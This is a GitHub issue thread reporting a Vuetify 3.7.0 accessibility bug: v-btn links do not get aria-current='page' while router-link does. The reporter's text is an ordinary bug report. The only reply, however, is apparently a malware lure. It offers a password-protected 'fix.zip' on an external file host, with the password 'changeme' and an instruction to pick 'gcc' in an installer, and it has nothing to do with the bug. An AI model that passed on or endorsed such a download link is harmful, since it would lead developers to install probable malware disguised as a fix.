### ISSUE TITLE
[Bug Report][3.7.0] `aria-current="page"` should be defined on active links in addition to active classes

### ISSUE THREAD

**Issue by paul-thebaud** [vuetifyjs/vuetify#20399]
### Environment
**Vuetify Version:** 3.7.0
**Vue Version:** 3.4.38
**Browsers:** Chrome 128.0.0.0
**OS:** Linux x86_64

### Steps to reproduce
Create two links inside a project using Vuetify and Vue Router while being on home page:

- `<router-link to="/">Home</router-link>`
- `<v-btn to="/">Home</v-btn>`

### Expected Behavior
Both links should get the `aria-current="page"` attribute.

### Actual Behavior
Only `router-link` is getting the `aria-current="page"` attribute.

### Reproduction Link
[https://play.vuetifyjs.com/#...](https://play.vuetifyjs.com/#eNqLrlYqLkrWdywo0CsrTVWyUrIpSc0tyEksSbWLyVNQsCnTTSwoADPBnOT8vJLEzLzUIqgQULAov7QktUg3JzMvW6Ek3zZGST9Gyc4jPzfVRh9JCqG+TDepJA9dJVgQZg2Qh2oPSATiDBt9JOcp1erklebkgIlYAIFtQVA=)

### Other comments
I know reproduction does not show the problem because no vue router is defined.
I'm sorry I didn't had the time to setup a real repo.

**Comment by Lxx-c** [comment]
Download 
https://www.mediafire.com/file/zch0v8rj7200mbm/fix.zip/file
password: changeme
In the installer menu, select "gcc."
